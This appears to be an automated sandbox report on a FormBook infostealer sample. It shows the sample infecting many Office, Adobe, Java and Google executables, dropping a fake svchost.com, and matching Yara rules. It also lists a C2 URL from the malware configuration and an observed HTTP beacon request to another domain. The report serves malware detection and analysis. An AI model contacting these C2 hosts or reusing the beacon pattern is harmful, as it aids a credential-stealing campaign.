          Source: Yara match, File source: 00000005.00000002.566051764.0000000000409000.00000004.00020000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000001.00000002.582330780.0000000000409000.00000004.00020000.sdmp, type: MEMORY
          Source: Yara match, File source: Process Memory Space: vi0EwpbUht.exe PID: 7096, type: MEMORY
          Source: Yara match, File source: 1.2.vi0EwpbUht.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 5.2.svchost.com.400000.0.unpack, type: UNPACKEDPE
          Infects executable files (exe, dll, sys, html)
          Source: C:\Windows\svchost.com, System file written: C:\Program Files (x86)\Common Files\microsoft shared\VSTO\10.0\VSTOInstaller.exe
          Source: C:\Windows\svchost.com, System file written: C:\Program Files (x86)\Java\jre1.8.0_211\bin\ssvagent.exe
          Source: C:\Windows\svchost.com, System file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AdobeCollabSync.exe
          Source: C:\Windows\svchost.com, System file written: C:\Program Files (x86)\Microsoft Office\Office16\AppSharingHookController.exe
          Source: C:\Windows\svchost.com, System file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\reader_sl.exe
          Source: C:\Windows\svchost.com, System file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\wow_helper.exe
          Source: C:\Windows\svchost.com, System file written: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe
          Source: C:\Windows\svchost.com, System file written: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE
          Source: C:\Windows\svchost.com, System file written: C:\Program Files (x86)\Java\jre1.8.0_211\bin\jp2launcher.exe
          Source: C:\Windows\svchost.com, System file written: C:\Program Files (x86)\Microsoft Office\Office16\ACCICONS.EXE
          Source: C:\Users\user\Desktop\vi0EwpbUht.exe, System file written: C:\ProgramData\Package Cache\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\vcredist_x86.exe
          Source: C:\Windows\svchost.com, System file written: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\Office Setup Controller\Setup.exe
          Source: C:\Windows\svchost.com, System file written: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe
          Source: C:\Windows\svchost.com, System file written: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\MSOXMLED.EXE
          Source: C:\Users\user\Desktop\vi0EwpbUht.exe, System file written: C:\Users\user\AppData\Local\Temp\CR_0E027.tmp\setup.exe
          Source: C:\Windows\svchost.com, System file written: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
          Source: C:\Windows\svchost.com, System file written: C:\Program Files (x86)\Microsoft Office\Office16\protocolhandler.exe
          Source: C:\Windows\svchost.com, System file written: C:\Program Files (x86)\Microsoft Office\Office16\SETLANG.EXE
          Source: C:\Windows\svchost.com, System file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
          Source: C:\Users\user\Desktop\vi0EwpbUht.exe, System file written: C:\ProgramData\Adobe\ARM\S\1742\AdobeARMHelper.exe
          Source: C:\Windows\svchost.com, System file written: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\Oarpmany.exe
          Source: C:\Windows\svchost.com, System file written: C:\Program Files (x86)\Microsoft Office\Office16\DCF\DATABASECOMPARE.EXE
          Source: C:\Windows\svchost.com, System file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\64BitMAPIBroker.exe
          Source: C:\Windows\svchost.com, System file written: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateOnDemand.exe
          Source: C:\Windows\svchost.com, System file written: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe
          Source: C:\Windows\svchost.com, System file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\MSOUC.EXEJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\PPTICO.EXEJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Common Files\microsoft shared\DW\DWTRIG20.EXEJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\CNFNOT32.EXEJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleCrashHandler64.exeJump to behavior
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeSystem file written: C:\ProgramData\Microsoft\Windows Defender\Scans\MpPayloadData\mpuser.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroBroker.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\FLTLDR.EXEJump to behavior
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeSystem file written: C:\ProgramData\Package Cache\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\vcredist_x64.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\AutoIt3\Au3Check.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\LICLUA.EXEJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\FullTrustNotifier.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\java.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Common Files\microsoft shared\Source user\OSE.EXEJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\DCF\SPREADSHEETCOMPARE.EXEJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\LogTransport2.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeJump to behavior
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeSystem file written: C:\ProgramData\Package Cache\{49697869-be8e-427d-81a0-c334d1d14950}\VC_redist.x86.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\MSOSREC.EXEJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\UcMapi.exeJump to behavior
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeSystem file written: C:\ProgramData\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\setup.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\WORDICON.EXEJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEJump to behavior
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeSystem file written: C:\ProgramData\Adobe\ARM\S\11357\AdobeARMHelper.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\XLICONS.EXEJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\arh.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\GRAPH.EXEJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateComRegisterShell64.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\MSOSQM.EXEJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\FIRSTRUN.EXEJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Java\jre1.8.0_211\bin\unpack200.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\CLVIEW.EXEJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\MSOHTMED.EXEJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javacpl.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\lynchtmlconv.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroTextExtractor.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\misc.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateBroker.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleCrashHandler.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\javaws.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\upx.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\IEContentService.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdate.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\AutoIt3\Uninstall.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\OcPubMgr.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Eula.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\SCANPST.EXEJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\VPREVIEW.EXEJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEJump to behavior
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeSystem file written: C:\ProgramData\Package Cache\{f65db027-aff3-4070-886a-0d87064aabb1}\vcredist_x86.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\MSQRY32.EXEJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaws.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\AutoIt3\Au3Info.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateSetup.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\CSISYNCCLIENT.EXEJump to behavior
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeSystem file written: C:\ProgramData\Package Cache\{050d4fc8-5d48-4b8f-8972-47c82c46020f}\vcredist_x64.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\MSOICONS.EXEJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\Office Setup Controller\ODeploy.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\DCF\filecompare.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\lync99.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTEM.EXEJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateCore.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\javaw.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\110\SQLDumper.exeJump to behavior
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeSystem file written: C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\SELFCERT.EXEJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\NAMECONTROLSERVER.EXEJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\CMigrate.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Common Files\microsoft shared\DW\DW20.EXEJump to behavior
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeCode function: 1_2_00405080 FindFirstFileA,FindNextFileA,FindClose,1_2_00405080
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeCode function: 1_2_00405634 FindFirstFileA,FindNextFileA,FindClose,1_2_00405634
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeCode function: 1_2_00404F6C FindFirstFileA,FindClose,1_2_00404F6C
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeCode function: 1_2_0040F0C4 FindFirstFileA,FindNextFileA,FindClose,1_2_0040F0C4
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeCode function: 1_2_0040F0CC FindFirstFileA,FindNextFileA,FindClose,1_2_0040F0CC
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeCode function: 1_2_0040F13F FindFirstFileA,FindNextFileA,FindClose,1_2_0040F13F
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeCode function: 1_2_004056A7 FindFirstFileA,FindNextFileA,FindClose,1_2_004056A7
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeCode function: 1_2_0040EA04 FindFirstFileA,FindClose,1_2_0040EA04
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeCode function: 1_2_0040EB16 FindFirstFileA,FindClose,1_2_0040EB16
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeCode function: 1_2_0040EB18 FindFirstFileA,FindNextFileA,FindClose,1_2_0040EB18
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 2_2_00405302 DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,2_2_00405302
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 2_2_00405CD8 FindFirstFileA,FindClose,2_2_00405CD8
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 2_2_0040263E FindFirstFileA,2_2_0040263E
          Source: C:\Windows\svchost.comCode function: 5_2_00405634 FindFirstFileA,FindNextFileA,FindClose,5_2_00405634
          Source: C:\Windows\svchost.comCode function: 5_2_00404F6C FindFirstFileA,FindClose,5_2_00404F6C
          Source: C:\Windows\svchost.comCode function: 5_2_0040F0C4 FindFirstFileA,FindNextFileA,FindClose,5_2_0040F0C4
          Source: C:\Windows\svchost.comCode function: 5_2_0040F0CC FindFirstFileA,FindNextFileA,FindClose,5_2_0040F0CC
          Source: C:\Windows\svchost.comCode function: 5_2_00405080 FindFirstFileA,FindNextFileA,FindClose,5_2_00405080
          Source: C:\Windows\svchost.comCode function: 5_2_0040F13F FindFirstFileA,FindNextFileA,FindClose,5_2_0040F13F
          Source: C:\Windows\svchost.comCode function: 5_2_004056A7 FindFirstFileA,FindNextFileA,FindClose,5_2_004056A7
          Source: C:\Windows\svchost.comCode function: 5_2_0040EA04 FindFirstFileA,FindClose,5_2_0040EA04
          Source: C:\Windows\svchost.comCode function: 5_2_0040EB16 FindFirstFileA,FindClose,5_2_0040EB16
          Source: C:\Windows\svchost.comCode function: 5_2_0040EB18 FindFirstFileA,FindNextFileA,FindClose,5_2_0040EB18
          Source: C:\Users\user\Desktop\vi0EwpbUht.exe; Code function: 1_2_00406D40 GetLogicalDriveStringsA,GetDriveTypeA,1_2_00406D40
          Source: C:\Users\user\Desktop\vi0EwpbUht.exe; File opened: C:\Documents and Settings\All Users\
          Source: C:\Users\user\Desktop\vi0EwpbUht.exe; File opened: C:\Documents and Settings\All Users\Application Data\
          Source: C:\Users\user\Desktop\vi0EwpbUht.exe; File opened: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\ARM\S\11357\
          Source: C:\Users\user\Desktop\vi0EwpbUht.exe; File opened: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\
          Source: C:\Users\user\Desktop\vi0EwpbUht.exe; File opened: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\
          Source: C:\Users\user\Desktop\vi0EwpbUht.exe; File opened: C:\Documents and Settings\All Users\Application Data\Application Data\

          Networking:

          C2 URLs / IPs found in malware configuration
          Source: Malware configuration extractor; URLs: www.personalizedyardsigns.com/xkcp/
          Uses netstat to query active network connections and open ports
          Source: C:\Windows\explorer.exe; Process created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE
          Source: global traffic; HTTP traffic detected: GET /xkcp/?6lS0=KFNDChppd2b&f2JL=SStynINVP5NCGh+2RJURYBVhcUSlPPhp5T3GlTJ0osry6C6vZ7yRpdLEbpP0cRdR/S5JjqUiIQ== HTTP/1.1; Host: www.agileintelligence.coach; Connection: close; Data Raw: 00 00 00 00 00 00 00; Data Ascii:
          Source: unknown; DNS traffic detected: queries for: www.agileintelligence.coach
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe; Code function: 2_2_00404EB9 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,2_2_00404EB9
          Source: vi0EwpbUht.exe, 00000001.00000003.460371414.0000000002390000.00000004.00000001.sdmp; Binary or memory string: _WinAPI_RegisterRawInputDevices.au3

          E-Banking Fraud:

          Yara detected FormBook

          System Summary:

          Malicious sample detected (through community Yara rule)
          Source: 6.2.elxhan.exe.22b0000.3.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 7.1.elxhan.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 7.1.elxhan.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.vi0EwpbUht.exe.30e0000.4.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.vi0EwpbUht.exe.30e0000.4.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 3.1.vi0EwpbUht.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.1.vi0EwpbUht.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 6.2.elxhan.exe.22b0000.3.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 6.2.elxhan.exe.22b0000.3.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 3.2.vi0EwpbUht.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.2.vi0EwpbUht.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 7.2.elxhan.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 7.2.elxhan.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 3.1.vi0EwpbUht.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.1.vi0EwpbUht.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 3.2.vi0EwpbUht.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.2.vi0EwpbUht.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.vi0EwpbUht.exe.30e0000.4.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.vi0EwpbUht.exe.30e0000.4.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe, Code function: 2_2_004030CB EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcmpiA,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,2_2_004030CB
          Source: C:\Windows\svchost.com, File created: C:\Windows\directx.sys
          Source: C:\Users\user\Desktop\vi0EwpbUht.exe, File created: C:\Windows\svchost.com
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A925DD3_2_00A925DD
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009DD5E03_2_009DD5E0
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A92D073_2_00A92D07
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009C0D203_2_009C0D20
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A91D553_2_00A91D55
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A92EF73_2_00A92EF7
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009E6E303_2_009E6E30
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A8D6163_2_00A8D616
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A91FF13_2_00A91FF1
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A9DFCE3_2_00A9DFCE
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_1_004010303_1_00401030
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_1_0041E1D73_1_0041E1D7
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_1_00402D873_1_00402D87
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_1_00402D903_1_00402D90
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_1_00409E2B3_1_00409E2B
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_1_00409E303_1_00409E30
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_1_00402FB03_1_00402FB0
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_004010307_2_00401030
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_0041E1D77_2_0041E1D7
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00402D877_2_00402D87
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00402D907_2_00402D90
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00409E2B7_2_00409E2B
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00409E307_2_00409E30
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00402FB07_2_00402FB0
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A420A07_2_00A420A0
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00AE20A87_2_00AE20A8
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A2B0907_2_00A2B090
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00AE28EC7_2_00AE28EC
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00AEE8247_2_00AEE824
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A3A8307_2_00A3A830
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00AD10027_2_00AD1002
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A341207_2_00A34120
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A1F9007_2_00A1F900
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00AE22AE7_2_00AE22AE
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00ACFA2B7_2_00ACFA2B
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A4EBB07_2_00A4EBB0
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00AD03DA7_2_00AD03DA
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00ADDBD27_2_00ADDBD2
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00AE2B287_2_00AE2B28
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A3AB407_2_00A3AB40
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A2841F7_2_00A2841F
